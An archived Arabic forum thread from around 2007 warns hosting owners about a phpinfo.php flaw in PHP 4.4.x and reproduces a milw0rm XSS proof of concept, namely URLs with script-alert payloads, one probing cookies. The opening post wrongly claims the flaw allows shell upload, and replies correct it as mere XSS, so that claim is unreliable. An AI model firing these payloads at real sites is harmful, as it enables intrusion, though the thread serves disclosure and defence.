بحث متقدم | التسجيل
الويب العربي
  تسجيل دخول
 
   
   

  ملاحظة
الموقع متاح للإطلاع والقراءة فقط، المشاركة والمواضيع الجديدة غير متاحة حالياً لحين تطوير الموقع.




الموقع متاح للإطلاع والقراءة فقط، المشاركة والمواضيع الجديدة غير متاحة حالياً لحين تطوير الموقع.

عـودة للخلف   الويب العربي المركز التعليمي المجاني أمن المعلومات

أمن المعلومات مقالات, أخبار, مواضيع حول أمن المعلومات, وحماية أنظمة التشغيل, الشبكات, المواقع, البيانات السرية.

موضوع مغلق اضف موضوع جديد
 
خيارات الموضوع طريقة العرض
  #1  
قديم 13-04-2007, 01:21 AM
nasimallil nasimallil غير متصل
عضو
 
تاريخ التسجيل: Nov 2006
مشاركة: 31
مستوى تقييم العضوية: 0
nasimallil is on a distinguished road
الافتراضي ثغرة خطيرة في نسخة php تسمح برفع شيل حصريا لدى منتديات الهكرز

بسم الله الرحمن الرحيم


####################################
جميع الحقوق محفوظة لمنتدى الهكرز
$###################################


يا اصحاب الأستضافات العربية ثغرة خطيرررة جداا في اصدارة ال php الثغرة موجوده في ملف phpinfo ومن خلال هذا الملف الموجوود نقدر نستغل الملف وفتح شيل من خلال هذا الملف

الحل هو حذف الملف هذا من السيرفر يجب التأكد من عدم وجود الملف في السيرفر او الموقع www.xxx.com/phpinfo.php تضع موقعك بدل xxx

www.xxx.com/phpinfo.php حذف ملف phpinfo.php الثغرة تم تطويرها من قبل هكرز محترفين :crazy: الحل مثل ما قلت حذف الملف ووجوده كعدمه
الأصدارة المصابة php 4 وايضا : PHP 4.4.3 - 4.4.6


المصدر مع الأستغلال حصريا مع منتديات الهكرز :




كود PHP:
To manually test for this vulnerability just call the phpinfo() page with a par***ter like this

http://localhost/phpinfo.php?a[]=<script>alert(/XSS/);</script> 

# milw0rm.com [2007-03-04] 
ويمكنك ايضا تطبيق الثغرة بهذا الاكواد وهذه الأاكود تسمح برفع شيل :



كود PHP:
http://site.com/phpinfo.php?cx[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]=[XSS] 


http://site.com/phpinfo.php?cx[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]=<script>alert(document.************************);</script> 

http://site.com/phpinfo.php?a[]=<script>alert(/Hi hacker5/);</script> 
تحياتي للجميع


ياليت الكل يقفلها لتفادي أختراق المواقع العربية والسيرفرات و

الموضوع الأصلي

http://www.hacker5.net/vb/showthread...sted=1#post 546






  #2  
قديم 14-04-2007, 09:51 AM
كافي عذاب كافي عذاب غير متصل
عضو
 
تاريخ التسجيل: May 2006
المدينة: هكركوز الكويت
مشاركة: 345
مستوى تقييم العضوية: 18
كافي عذاب is on a distinguished road
وسام الويب البرونزي 
عدد الأوسمة: 1 (المزيد ...)
الافتراضي

شكرا لك واااصل





  #3  
قديم 21-04-2007, 02:59 PM
الصريح جداً الصريح جداً غير متصل
عضو
 
تاريخ التسجيل: May 2006
المدينة: جـ JeDDaH ـدة
مشاركة: 2,933
مستوى تقييم العضوية: 0
الصريح جداً is on a distinguished road
وسام الويب الذهبي وسام الويب الفضي وسام الويب البرونزي 
عدد الأوسمة: 3 (المزيد ...)
الافتراضي

يعطيك العافية أخوي لكن موب شيل

هذي ثغرة xss وما تفيد في أي شي لأن لايوجد كوكيز ينسرق أساساً ^_^

تشآآآآآآآآآآو






التوقيع
كنتُ هنا يوماً ما ...
  #4  
قديم 23-04-2007, 07:46 PM
سوري سوري غير متصل
عضو
 
تاريخ التسجيل: Apr 2006
مشاركة: 6
مستوى تقييم العضوية: 0
سوري is on a distinguished road
الافتراضي

اخي الكريم كل اسوبع اراجع مواقع امن المعلومات والهاكرز لم ارى احد يتحدث عن هذه الثغرة

ممكن اتكون بالفعل لايعرفها الكثير لكن لااعتقد ذلك واكيد هذا ليس تشكيك بمعلوماتك لاسمح الله انما للاستفادة فقط

وكما قال احد الاخوة لايوجد كوكيز يخزن كلمات السر حتى استخدمها لو كانت موجودة فا xss تستخدم في سرقة محتويات الكوكيز كما حصل مع الهوتمل الاصدار القديم وليس الذي يعتمد على اجاكس






التوقيع
موقع مدرسة القصاب
www.alkasabschool.com
موقع تفسير الأحلام
www.islamnet.ws/dream
موضوع مغلق




قوانين المشاركة
لا يمكنك إضافة موضوع جديد
لا يمكنك الرد على المواضيع
لا يمكنك إضافة مرفقات
لا يمكنك تعديل مشاركاتك

كود vB متاح
كود [IMG] متاح
كود HTML مغلق
إنتقل إلى

مواضيع مشابهة
الموضوع الكاتب القسم مشاركة آخر مشاركة
[ثغرة]ثغرة في الاهداءات = خطيرة + خطيرة + خطيرة ... احذر تسلم العبقري قسم المنتديات 39 09-10-2007 09:32 PM
ثغرة خطيرة في جميع منتديات vB AboAyoob قسم المنتديات 15 12-09-2006 01:41 PM
ثغرة خطيرة جداً في نسخة برنامج الـvBulletin كلمة جروب قسم المنتديات 1 01-06-2006 08:42 AM
ثغرة خطيرة وطريقة ترقيعها System 4 Host قسم المنتديات 7 09-05-2006 04:43 PM
ثغرة خطيرة فى منتديات vb3 ارجو دخول الخبراء ضرورى amr922 أمن المعلومات 4 30-12-2004 02:32 AM


جميع الأوقات بتوقيت مكة المكرمة. الساعة الآن » 04:47 PM.

Powered by vBulletin
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.


 
 »  خدمات البرمجة   »  رئيسية الدليل
  »  خدمات التصميم   »  الأمن والحماية
  »  الدعاية والتسويق
  »  الدعم والتطوير
  »  الشركات الرسمية
  »  حجز دومينات
  »  خدمات الإستضافة
 
 
  »  مكتبة الإستايلات   »  رئيسية المكتبة
  »  أكواد برمجية   »  أدوات الويب ماسترز
  »  مكتبة الهاكات   »  أدوات المصممين
  »  سكربتات متنوعة
  »  مجلات إلكترونية
  »  بلوكات متنوعة
  »  ثيمات مختلفة
 
 

صحيفة متخصصة في متابعة أخبار وجديد الإنترنت العربي
والحوارات الصحفية ومعلومات تقنية متنوعة .

   
 
 

للتواصل مع فريق عمل الويب العربي
يمكنك ذالك من خلال مركز الدعم والمساندة.

 الدعم الفني |  اعتماد العضويات |  قوانين الإنتساب |  إتفاقية الإستخدام |  أهداف الويب العربي |  دليل الشركات |  مكتبة الويب |  صحيفة الويب العربي |  الرئيسية